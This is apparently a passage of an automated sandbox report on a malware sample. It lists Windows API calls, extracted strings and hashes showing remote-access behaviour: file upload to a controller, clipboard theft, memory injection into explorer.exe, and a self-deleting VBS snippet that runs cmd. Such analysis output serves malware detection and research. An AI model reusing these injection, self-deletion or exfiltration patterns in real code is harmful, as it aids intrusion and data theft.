                                                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                • Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
                                                                                                • Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                • Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                • Opcode Fuzzy Hash: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                • String ID: /stext "$@TG$@TG
                                                                                                • API String ID: 1223786279-723413999
                                                                                                • Opcode ID: 38617018d286a3b87a0abf8149734a2fccd9fe0e4487ad0e26cec028f794f095
                                                                                                • Instruction ID: 54c64e465a66050ec466d83b34d0c9889d7f3cdaa7358c1e9e14d2467042f0e2
                                                                                                • Opcode Fuzzy Hash: 38617018d286a3b87a0abf8149734a2fccd9fe0e4487ad0e26cec028f794f095
                                                                                                • Instruction Fuzzy Hash: 5B0268315083414AC325FB62D891AEFB3E5AFD0348F50483FF58A971E2EF785A49C65A
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                • _free.LIBCMT ref: 0045137F
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • _free.LIBCMT ref: 004513A1
                                                                                                • _free.LIBCMT ref: 004513B6
                                                                                                • _free.LIBCMT ref: 004513C1
                                                                                                • _free.LIBCMT ref: 004513E3
                                                                                                • _free.LIBCMT ref: 004513F6
                                                                                                • _free.LIBCMT ref: 00451404
                                                                                                • _free.LIBCMT ref: 0045140F
                                                                                                • _free.LIBCMT ref: 00451447
                                                                                                • _free.LIBCMT ref: 0045144E
                                                                                                • _free.LIBCMT ref: 0045146B
                                                                                                • _free.LIBCMT ref: 00451483
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                • API String ID: 3086580692-2596673759
                                                                                                • Opcode ID: a61a8049a5d6a82d20a64dbbd0cf336a534be65d40654f4dc6c97dc52abac298
                                                                                                • Instruction ID: 2d1ece25e1b497defd969945f9de4b01d63c4d7912a1bb42583949d7b10afa87
                                                                                                • Opcode Fuzzy Hash: a61a8049a5d6a82d20a64dbbd0cf336a534be65d40654f4dc6c97dc52abac298
                                                                                                • Instruction Fuzzy Hash: 76B1A0316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB9B
                                                                                                APIs
                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                                  • Part of subcall function 00413733: RegCloseKey.KERNELBASE(00000000), ref: 00413773
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$Temp$exepath$open
                                                                                                • API String ID: 1913171305-833065420
                                                                                                • Opcode ID: 04d70a03bbc3f3b7202041afa2082218f197807b0f0dee89797c103131059630
                                                                                                • Instruction ID: 050033375253242a90a907d975c9615f3488646990559cd5331657e2136e0730
                                                                                                • Opcode Fuzzy Hash: 04d70a03bbc3f3b7202041afa2082218f197807b0f0dee89797c103131059630
                                                                                                • Instruction Fuzzy Hash: 514139319001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E4ACA98
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                APIs
                                                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: \&G$\&G$`&G
                                                                                                • API String ID: 269201875-253610517
                                                                                                • Opcode ID: 0824e7aa1874106c2a06b8faea0234afc0e854fad8f6d89c65d52aec9f97b586
                                                                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                • Opcode Fuzzy Hash: 0824e7aa1874106c2a06b8faea0234afc0e854fad8f6d89c65d52aec9f97b586
                                                                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                • GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                • GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                • _free.LIBCMT ref: 0043A9C3
                                                                                                • _free.LIBCMT ref: 0043A9CA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                • API String ID: 2956720200-749203953
                                                                                                • Opcode ID: 12852d6bc5b46f9587c338b97c007cdef4094efca5628a1d2a52f2a43cec2207
                                                                                                • Instruction ID: af141abdc89e6f99b360bf73ca1bd21391e8bea30a055eafc68b1e1601de11b4
                                                                                                • Opcode Fuzzy Hash: 12852d6bc5b46f9587c338b97c007cdef4094efca5628a1d2a52f2a43cec2207
                                                                                                • Instruction Fuzzy Hash: 6F419E71604301ABCB14FB76DC5A86F37A9AB85704F40493EF516A32E1EF3C8905CB9A
                                                                                                APIs
                                                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                • String ID: <$@$@VG$@VG$Temp
                                                                                                • API String ID: 1704390241-1291085672
                                                                                                • Opcode ID: 9af8200f3ee1639701cccb04960a61a80750d0e9051a8b89500f0c6a32ec4c99
                                                                                                • Instruction ID: 17e4c8e037c7e297ff37edeb8814921eaebe5ca95f3622e3753009d7d6553322
                                                                                                • Opcode Fuzzy Hash: 9af8200f3ee1639701cccb04960a61a80750d0e9051a8b89500f0c6a32ec4c99
                                                                                                • Instruction Fuzzy Hash: 15417E319002199ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00472B28,00000000,RGw@,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                • GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004074D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess
                                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$RGw@
                                                                                                • API String ID: 2050909247-1783200977
                                                                                                • Opcode ID: 1a1eb9634b651143de70fee5b7a2289a57af99024fb0b6e7e4d2875ac9661c3b
                                                                                                • Instruction ID: b8c3dc73ce560081c95a6921e0e4b034ac7c55c8f908ce4a4bfc67d5bc942e58
                                                                                                • Opcode Fuzzy Hash: 1a1eb9634b651143de70fee5b7a2289a57af99024fb0b6e7e4d2875ac9661c3b
                                                                                                • Instruction Fuzzy Hash: 7631C271604700ABD311EF65DE46F1677A8FB48315F10087EF509E6292DBB8B8418B6E
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID: !D@
                                                                                                • API String ID: 2172192267-604454484
                                                                                                • Opcode ID: 7be66b7c6d22a24665ea8efe49d73a8374f168185230e6da9151f71de6443d1b
                                                                                                • Instruction ID: 51ec5b3583c04982a71d168622c94cade283f75070810aedfe93923cca0dc87c
                                                                                                • Opcode Fuzzy Hash: 7be66b7c6d22a24665ea8efe49d73a8374f168185230e6da9151f71de6443d1b
                                                                                                • Instruction Fuzzy Hash: 41014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                APIs
                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                • String ID:
                                                                                                • API String ID: 297527592-0
                                                                                                • Opcode ID: 6c4afa5863eaa99705a7796b4049685c5ffc1d41bc06d7032679042578303c3d
                                                                                                • Instruction ID: cfdeae1586e3f17d3ae994cf28232467201964e06db1490d1c70a6fe2d897c90
                                                                                                • Opcode Fuzzy Hash: 6c4afa5863eaa99705a7796b4049685c5ffc1d41bc06d7032679042578303c3d
                                                                                                • Instruction Fuzzy Hash: A841F371104301BBD7109F26EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 004481B5
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • _free.LIBCMT ref: 004481C1
                                                                                                • _free.LIBCMT ref: 004481CC
                                                                                                • _free.LIBCMT ref: 004481D7
                                                                                                • _free.LIBCMT ref: 004481E2
                                                                                                • _free.LIBCMT ref: 004481ED
                                                                                                • _free.LIBCMT ref: 004481F8
                                                                                                • _free.LIBCMT ref: 00448203
                                                                                                • _free.LIBCMT ref: 0044820E
                                                                                                • _free.LIBCMT ref: 0044821C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
